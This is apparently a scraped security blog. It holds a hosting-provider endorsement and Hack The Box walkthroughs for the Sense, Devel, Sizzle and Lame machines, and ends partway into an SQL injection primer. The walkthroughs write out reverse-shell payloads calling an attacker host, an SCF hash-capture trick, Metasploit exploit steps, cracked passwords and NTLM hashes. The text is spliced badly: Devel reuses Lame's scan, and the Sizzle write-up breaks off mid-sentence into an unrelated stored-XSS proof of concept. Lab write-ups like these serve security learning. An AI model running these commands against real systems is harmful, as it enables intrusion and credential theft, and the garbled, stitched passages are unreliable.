Recommended Hosting Provider

Hi Guys,

Real-Life Experience –

In the last few months, I have gone through various blogs about the best hosting platform to use for blogging and also for high performance. I even did few polls on every social platform and in 90% of those polls, Siteground was the winner. Although the following factors were truly recommending me Siteground still, I thought of researching more ——

  1. Google suggested – Siteground
  2. My Research suggested – Siteground
  3. Social platform polls suggested – Siteground
  4. My Mind – Take some more time

Basically, during that time I didn’t have money for buying the least Siteground package so I looked on other platforms where they offer a trial period. Accordingly, I started working on various other platforms to have practical knowledge, and later I figured out that in Siteground also they offer 30 days money-back guarantee where if you cancel your subscription anytime within 30 days then they will refund your money back without any question.

Check it out : Best for beginners

Eventually, I purchased a starter pack for one of my clients and structured the blogging site accordingly.

Check it out : Best for Ecommerce

In the next 1-2-3 weeks, I was not getting much traffic. At that time I thought maybe I am a mess !! I researched how to bring traffic and SEO optimization. Everywhere it has been mentioned that it is paid blah blah but when I searched the tool in my hosting platform i.e, in Siteground then I got that for free because all of them come inbuilt in your package. I was really amazed to see that so many tools they are providing categorically as an inbuilt thing with your package.

Check it out : Best for WP platform

I wish that I can show you how much traffic I was able to grab by doing that but I don’t have my client approval to show the graph.

I recommend to everyone who all are working on various blogging and knowledge sharing platforms or any platforms where you need a hosting plan please try Siteground because as per my experience it’s the best ❤

Thank You

# Follow upcoming blog – hacksayan.com

Regards, 

HackSayan

7th May 2020

How It Got Started

It’s almost 4 years I am working in the Cyber Security domain and in this span, I got to know about a few good vulnerabilities while working in various engagements. So I thought of penning it down somewhere as my own repo and that was the main motive behind creating hacksayan.wordpress.com and gradually I thought of migrating from free to paid service 🙂 So I recently migrated here and I will keep updating this blog about my Vulnerability findings as of now and later will see if I can add more.

www.hacksayan.com

References

Owned Cve Id

  • CVE – 2018 – 6934

  • CVE – 2018 – 10110

  • CVE – 2018 – 8772

  • CVE – 2018 – 6870

 

Security is not a product, but a process !!

HTB Machine Walkthrough – Sense

###################################################################

# Machine Name – Sense

# Machine Ip – 10.10.10.60

# OS Type – Linux

# Date – 09.05.2020

# Walk-through Author – Sayan Chatterjee

# Follow upcoming blog – hacksayan.com

###################################################################

 

Please follow the below steps with me to get the user.txt and root.txt :

  • Nmap :

root@kali:~/Desktop/HTB/Linux/Sense# nmap -Pn -sC -sV -O 10.10.10.60 –script vuln -oA SenseInitialVuln

Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-26 10:16 EDT
Nmap scan report for 10.10.10.60
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-server-header: lighttpd/1.4.35
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
443/tcp open ssl/http lighttpd 1.4.35
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
| /javascript/sorttable.js: Secunia NSI
| /changelog.txt: Interesting, a changelog.
|_ /tree/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the “CCS Injection” vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 OSVDB:113251
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the “POODLE” issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| References:
| http://osvdb.org/113251
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.72 seconds

  • Exploit Workaround :
  1. We tried various ways to crack anything from 80 and 443 port but nothing worked apart from the following gobuster command and we got the username from the text file and collected the default credentials from internet for pf-sense.
    • gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -x php,txt,confhttps://10.10.10.60/system-users.txt####Support ticket###
      Please create the following user
      username: Rohit
      password: company defaults

      The default credentials for a pfSense® firewall are: Username: admin. Password: pfsense.

      Credentials worked : rohit, pfsense

  2. Once we logged in we got to know that the version of pfsense is 2.1.319-1.png
  3. Next we explored in searchsploit for any known vulnerabilities and we got this.
    • root@kali:~/Desktop/HTB/Linux/Sense# searchsploit pf sense
    • —————————————————————— —————————————-
      Exploit Title | Path
      | (/usr/share/exploitdb/)
      —————————————————————— —————————————-
      pfSense – ‘interfaces.php?if’ Cross-Site Scripting | exploits/hardware/remote/35071.txt
      pfSense – ‘pkg.php?xml’ Cross-Site Scripting | exploits/hardware/remote/35069.txt
      pfSense – ‘pkg_edit.php?id’ Cross-Site Scripting | exploits/hardware/remote/35068.txt
      pfSense – ‘status_graph.php?if’ Cross-Site Scripting | exploits/hardware/remote/35070.txt
      pfSense – (Authenticated) Group Member Remote Command Execution ( | exploits/unix/remote/43193.rb
      pfSense 2 Beta 4 – ‘graph.php’ Multiple Cross-Site Scripting Vuln | exploits/php/remote/34985.txt
      pfSense 2.0.1 – Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/23901.txt
      pfSense 2.1 build 20130911-1816 – Directory Traversal | exploits/php/webapps/31263.txt
      pfSense 2.2 – Multiple Vulnerabilities | exploits/php/webapps/36506.txt
      pfSense 2.2.5 – Directory Traversal | exploits/php/webapps/39038.txt
      pfSense 2.3.1_1 – Command Execution | exploits/php/webapps/43128.txt
      pfSense 2.3.2 – Cross-Site Scripting / Cross-Site Request Forgery | exploits/php/webapps/41501.txt
      pfSense 2.4.1 – Cross-Site Request Forgery Error Page Clickjackin | exploits/php/remote/43341.rb
      pfSense < 2.1.4 – ‘status_rrd_graph_img.php’ Command Injection | exploits/php/webapps/43560.py
      pfSense Community Edition 2.2.6 – Multiple Vulnerabilities | exploits/php/webapps/39709.txt
      pfSense Firewall 2.2.5 – Config File Cross-Site Request Forgery | exploits/php/webapps/39306.html
      pfSense Firewall 2.2.6 – Services Cross-Site Request Forgery | exploits/php/webapps/39695.txt
      pfSense UTM Platform 2.0.1 – Cross-Site Scripting | exploits/freebsd/webapps/24439.txt
  4. Now we exploited the mentioned vulnerability and got the shell.
    • python3 43560.py –rhost 10.10.10.60 –lhost 10.10.14.28 –lport 1234 –username rohit –password pfsense

19-2.png

    • nc -nlvp 1234

19-3

  • Flags :
    1. User – 87###
    2. Root – d0###
  • Tools Used :
    1. nmap
    2. python
  • Machine Summary :
    1. Basic & Privilege Escalation
      • OS Type – Linux
      • OS Version – FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
      • Exploit Service – http (pfsense)
      • Exploit Payload – pfSense < 2.1.4 – ‘status_rrd_graph_img.php’ Command Injection https://www.exploit-db.com/exploits/42315

 

Thank You !!

HTB Machine Walkthrough – Devel

###################################################################

# Devel – Windows Os

# Date: 27.07.2019

# Walkthrough Author: Sayan Chatterjee ######################################################################### Please follow the below commands to get the user.txt and root.txt :

  1. Perform nmap scan on 10.10.10.5
    • Command : nmap -sC -sV -oA Devel 10.10.10.5
    • Output :

# Nmap 7.70 scan initiated Thu Jul 25 11:35:11 2019 as: nmap -sC -sV -oA Lame 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.12
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h04m02s, deviation: 0s, median: -2d23h04m02s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-22T08:31:33-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 25 11:36:15 2019 — 1 IP address (1 host up) scanned in 63.87 seconds

2. Port 21: Check ftp connection with anonymous account. It will work and you will able to see that u can upload and download any file from the remote server using filezilla.

Steps to Exploit:

  1. Open terminal
  2. Type msfconsole (Starting metasploit)
  3. Next create the reverse shell using msfvenom :
    • msf > msfvenom p windows/meterpreter/reverse_tcp lhost=AttackerIp lport=4444 f aspx > reversetcpshell.aspx
  4. Then transfer your shell.aspx file into victims’ system using Filezilla.
    Access the uploaded file from the web browser.
  5. After executing uploaded backdoor file come back to the Metasploit framework and enter the following and wait for the meterpreter session to be created.
    msf> use exploit/multi/handler
    msf> exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
    msf> exploit(multi/handler) set lhost 10.10.14.6
    msf> exploit(multi/handler) set lport 4444
    msf> exploit(multi/handler) exploit
  6. Once the meterpreter session is created type ‘sysinfo’ and see the machine details
  7. Then I ran a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. After having received a session we can use the multi/recon/local_exploit_suggester exploit to find candidates for out privilege escalation phase.
    • msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
    • msf post(multi/recon/local_exploit_suggester) > options
    • msf post(multi/recon/local_exploit_suggester) > set session 1
    • msf post(multi/recon/local_exploit_suggester) > exploit
  8. Wonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with the last option as highlighted in the image.
  9. Looks like we have more than a handful to try. I tried the first one on my own and couldn’t get it to work. So we can move on the the second one, ms10_015_kitrap0d. Looking on Microsoft’s security bulletin, ms10_015 is a kernel bug that allows users to run arbitrary code in kernel mode. You can read more about it .

    Let’s continue exploit the machine by loading up our priv esc exploit in metasploit.

  10. Try these :
    • msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_05_kitrap0d
    • msf exploit(windows/local/ms10_05_kitrap0d) > show options
    • msf exploit(windows/local/ms10_05_kitrap0d) > set session 1
    • msf exploit(windows/local/ms10_05_kitrap0d) > run
  11. If you get the shell search for root.txt and user.txt.

###########################################################################

HTB Machine Walkthrough – Sizzle

#########################################################################
# Sizzle - Windows Os
# Date: 25.07.2019
# Walkthrough Author: Sayan Chatterjee

Quick Summary

Hey guys today Sizzle retired and here’s my write-up about it. Sizzle was a great machine, everything about it was great. It was very realistic, fun and of course challenging as it was rated Insane. Personally one of my favorites and one of the best Active Directory boxes I have ever solved. It starts by getting write access to a directory in an smb share, a simple scf file attack with responder and john could give me a password for a user. With that password I could generate a certificate request and get a certificate then a WinRm session. After that comes the most challenging part about the box which is bypassing antivirus, kerberoasting and privilege escalation but before doing that we will take a look at an unintended way first. That was the box in a nutshell, It’s a Windows box and its ip is 10.10.10.103, I added it to /etc/hosts as sizzle.htb. Let’s jump right in ! Nmap As always we will start with nmap to scan for open ports and services : nmap -sV -sT -sC sizzle.htb Full Output :
# Nmap 7.70 scan initiated Fri May 31 19:41:35 2019 as: nmap -sV -sT -sC -o nmapinitial sizzle.htb
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.15s latency).
Not shown: 987 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:44+00:00; -6s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:41+00:00; -6s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:43+00:00; -5s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:42+00:00; -6s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2019-05-31T17:44:41+00:00; -6s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/31%Time=5CF1678A%P=i686-pc-linux-gnu%r(DNSVer
SF:sionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x0
SF:4bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5s, deviation: 0s, median: -6s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-05-31 19:44:44
|_ start_date: 2019-05-31 12:06:07

We got a lot of ports, we got ftp on port 21, dns on port 53, http on port 80, smb and ldap. We also see that the domain is HTB.LOCAL and commonName is sizzle.htb.local, so I added it to /etc/hosts :  anonymous authentication on ftp was allowed but there was nothing there so I will skip that. HTTP I checked that http server and the index only had a simple gif. So I ran gobuster : =====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://sizzle.htb/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/31 19:51:59 Starting gobuster
=====================================================
/aspnet_client (Status: 301)
/certenroll (Status: 301)
/Images (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
=====================================================
2019/05/31 19:53:24 Finished
===================================================== /certenroll sounds interesting, but unfortunately it’s a 403 It’s time to check smb . SMB, SCF File Attack, amanda’s Credentials First thing we need to know is the shares, we can use smbclient to list the shares : smbclient --list //sizzle.htb/ -U "" I noticed that there was a share for Active Directory Certificate Services. Most likely /certsrv will be on the web server . Try http://sizzle.htb/certsrv Yes it was there, and we need credentials. Back to smb the only share I could access anonymously was Department Shares smbclient --list //sizzle.htb/"Department Shares" -U "" It had a lot of directories, I could write to 2 of them : ZZ_ARCHIVE and Users/Public. We are looking for credentials. Since we can write to one of the directories then we can possibly apply an scf file attack. You can read about it here. We are going to put an scf file in Users/Public. It looks like this : #cat @hacksayan.scf [Shell]
Command=2
IconFile=\\10.10.xx.xx(my ip)\share\hacksayan.ico
[Taskbar]
Command=ToggleDesktop Then we will run responder. Whenever a user browses that directory he will automatically try to connect to my box through smb, that’s when responder catches the hashes. Then go to \Users\Public and place the scf file smb: \Users\Public\> put @hacksayan.scf Then turn on the responder. root@kali:~# responder -wrf --lm -v -I tun0 responder caught hash for a user called amanda. Let’s crack it with john : root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt amanda.hash The password is Ashare1972 Requesting a Certificate, WinRm Session as amanda I tried to access certenroll as amanda and it worked fine : smbclient //sizzle.htb/certenroll -U amanda So I went to /certsrv and used amanda’s credentials to authenticate Now it’s time to get a certificate. But wait a second, what’s the certificate for anyway ? A full nmap scan shows that WinRm ports are open : nmap -p- -T5 -vvv --max-retries 1 sizzle.htb Full Output :
# Nmap 7.70 scan initiated Fri May 31 20:22:10 2019 as: nmap -p- -T5 -vvv -o nmapfull --max-retries 1 sizzle.htb
Warning: 10.10.10.103 giving up on port because retransmission cap hit (1).
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2019-05-31 20:22:10 EET for 220s
Not shown: 65506 filtered ports
Reason: 65506 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49679/tcp open unknown syn-ack ttl 127
49682/tcp open unknown syn-ack ttl 127
49683/tcp open unknown syn-ack ttl 127
49686/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49701/tcp open unknown syn-ack ttl 127
54195/tcp open unknown syn-ack ttl 127
54204/tcp open unknown syn-ack ttl 127
nmap -p 5985,5986 -sV -sT -sC sizzle.htb Full Output :
# Nmap 7.70 scan initiated Fri May 31 20:27:46 2019 as: nmap -p 5985,5986 -sV -sT -sC -o nmapwinrm sizzle.htb
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2019-05-31T17:56:26
|_Not valid after: 2020-05-30T17:56:26
|_ssl-date: 2019-05-31T18:28:30+00:00; -6s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6s, deviation: 0s, median: -6s

Port 5985 uses http while 5986 uses https. When I got amanda’s credentials I tried to connect to port 5985 and I couldn’t, So we will do it through port 5986 that’s why we need a certificate. (If you don’t know how to connect through WinRm, we’ll get to that later.) We will generate a certificate request and a private key : openssl req -newkey rsa:2048 -nodes -keyout request.key -out request.csr Then we will submit an advanced certificate request on the portal which we got after authenticating amanda in /certserv through smbclient. Paste our request and download the certificate (base64 encoded) Now we can use WinRm, but what’s WinRm ?

Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate. The WS-Management protocol specification provides a common way for systems to access and exchange management information across an IT infrastructure. WinRM and Intelligent Platform Management Interface (IPMI), along with the Event Collector are components of the Windows Hardware Management features. –Microsoft

WinRm is not meant to be used from Linux but luckily there’s a Ruby library for it. That’s how we will connect. I used Alamot’s shell and added some stuff for the cert and the key : # cat winrm.rb #!/usr/bin/ruby
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new( 
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: '/root/Desktop/HTB/boxes/sizzle/certs/certnew.cer',
  client_key: '/root/Desktop/HTB/boxes/sizzle/certs/request.key',
  :no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end And it worked : # ./winrm.rb

whoami

htb\amanda

But there was no user.txt Stored NTLM Hashes, Secretsdump, Privilege Escalation Through the filesystem enumeration I found a file called file.txt in C:\Windows\System32. That file had NTLM hashes for all users !

PS htb\amanda@SIZZLE C:\> cat windows/system32/file.txt

Output :

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::

Domain    User  ID  Hash
------    ----  --  ----
HTB.LOCAL Guest 501 -   
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef::: Honestly I don’t know how did that get there, After resetting the machine the file was still there. I don’t know if the creator made an unintended mistake but anyway let’s see how can we use that. That Administrator hash was useless, I tried it with smb, I cracked it, tried psexec. It didn’t work. I cracked mrlky’s hash : The password was Football#7, I used it with secretsdump.py from impacket and got another Administrator’s hash : ####################################################################################### Proof of Concept ================= URL: https://www.phpscriptsmall.com/product/car-rental-script/ Attack Vector : User Name Payload : <svg/onload=alert(document.cookie)> Reproduction Steps: ------------------------------ 1. Access the above URL 2. Click on "User Demo" 3. Application will be redirected to http://travelbookingscript.com/demo/taxibooking_new/index.php 4. Goto "Register" and Create a New User 5. Now Login into the application and Click on : My Account " 6. Click on "Edit Profile" -> Select "User Name" and inject <svg/onload=alert(document.cookie)> 7. Persistent XSS will be executed. T

HTB Machine Walkthrough – Lame

#########################################################################
# Lame - Linux Os
# Date: 26.07.2019
# Walkthrough Author: Sayan Chatterjee

#########################################################################

Please follow the below commands to get the user.txt and root.txt :
  1. Perform nmap scan on 10.10.10.3
    • Command : nmap -sC -sV -oA Lame 10.10.10.3
    • Output :

# Nmap 7.70 scan initiated Thu Jul 25 11:35:11 2019 as: nmap -sC -sV -oA Lame 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.12
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h04m02s, deviation: 0s, median: -2d23h04m02s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-22T08:31:33-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 25 11:36:15 2019 — 1 IP address (1 host up) scanned in 63.87 seconds

2. Port 21: Check ftp connection with anonymous account. It will work but you will not get any sensitive info for enumeration

3. Port 22: Check ssh connection with default user/user but it will not work and will ask for correct password.

4. Port 139, 445: Samba smbd 3.X - 4.X. Check if any exploit available for the respective Samba version.

How to check?

Google :::

Refer this - https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

Steps to Exploit :
  1. Open terminal
  2. Type msfconsole (Starting metasploit)
  3. Next follow the steps :
    • msf > search samba
    • msf > use exploit/multi/samba/usermap_script
    • msf exploit(usermap_script) > show options
      
      ...show and set options...
    • msf exploit(usermap_script) > set RHOSTS LameIp
    • msf exploit(usermap_script) > exploit
  4. You will get the access of root
  5. Check pwd and do ls
  6. Look for user and root directory
  7. Inside 'user' directory -> inside 'makeis' directory -> get user.txt flag
  8. Inside 'root' directory -> get root.txt flag

###########################################################################

SQL Injection Fundamentals

Definition :

SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS).

Types of SQL Injection (SQLi)

SQL Injection can be classified into three major categories –

  1. In-band SQLi
  2. Inferential SQLi
  3. Out-of-band SQLi

1. In-band SQLi :

In-band SQL Injection is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results.

The two most common types of in-band SQL Injection are Error-based SQLi and Union-based SQLi.

  • Error-based SQLi

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead.

  • Union-based SQLi

Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.

2. Inferential SQLi (Blind SQLi) :

Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server.

